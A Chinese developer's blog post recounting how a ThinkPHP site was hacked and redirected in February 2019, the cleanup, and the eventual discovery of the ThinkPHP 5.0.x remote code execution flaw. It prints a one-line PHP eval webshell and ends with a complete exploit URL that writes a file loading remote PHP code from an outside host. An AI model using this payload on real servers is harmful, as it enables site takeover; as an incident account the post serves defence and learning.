欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

苍了个天了~网站被挂马!

程序员文章站 2022-04-09 18:57:39
【注:PHP、ThinkPHP】 事情是这样的~ 2019年2月12日,根据客户的反应,说点击网站上的链接都会跳转的别的第三方的网站。然后就开始排查,登录上服务器,把项目的所有文件拷贝下来。 打开入口文件,里面的代码原来是被替换成静态的前端代码~我晕~ 当务之急是让网站可以正常的运行,先把这入口文件 ......

【注:php、thinkphp】

事情是这样的~

2019年2月12日,根据客户的反应,说点击网站上的链接都会跳转的别的第三方的网站。然后就开始排查,登录上服务器,把项目的所有文件拷贝下来。

打开入口文件,里面的代码原来是被替换成静态的前端代码~我晕~  当务之急是让网站可以正常的运行,先把这入口文件改回以前的代码上传到服务器,这样网站暂时是可以正常运行了。

但是需要找的问题的根本所在,这种网站代码恶意被修改的事我是第一次遇到,以前都是听说过没见过。 没有经验,就上百度。找一下这个问题的处理和排查流程。

根据网上所述,首先是将一句话代码(<?php @eval($_post['a'])>)上传到网站,然后通过这个一句上传一个可以操作网站目录的文件,再通过这个文件对网站的代码进行修改和上传。

所以现在要做的是:

1、首先找到已经被上传到网站的恶意文件,将其删除。

2、找到攻击者所利用的代码中的漏洞。

怎么找到那些已经被上传上来的文件,可以下载安全狗对拷贝下来的所有代码进行扫描,这些文件的代码有的写法会相同。会存在一些函数 eval、assert,这些文件还好找,找着后在服务器上删除就好了。难的是找到代码中的漏洞,网上提供了一些可能会出现漏洞的地方,一个是上传文件的地方,一个是编辑器插件中带的上传功能。

这些地方我一个试了试,排查了一遍。

2月13日,我发现网站首页又被修改了,看来问题的根本没有找对,继续在网上百度,问一些大佬。

2月14日,还是再找。

2月15日,一位大佬给我发来了一个thinkphp框架的漏洞信息,说的是thinkphp5.0 ~ 5.0.23之间的版本都存在一个严重的漏洞,可通过这个漏洞执行写文件的操作。

赶紧升级版本,升级的安全的版本。

之后,我也试了一下有漏洞的那个版本,真的可以很容易的将想要的代码写入到文件,然后在线上运行。

而且就是一行连接就能搞定:

项目域名加上

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3c?php%20@eval(file_get_contents(%22http%3a%2f%2fcqy666.cn%2fphp.jpg%22))?^%3e%3etest.php

然后访问test.php,就能操作网站的所有目录了。amezing~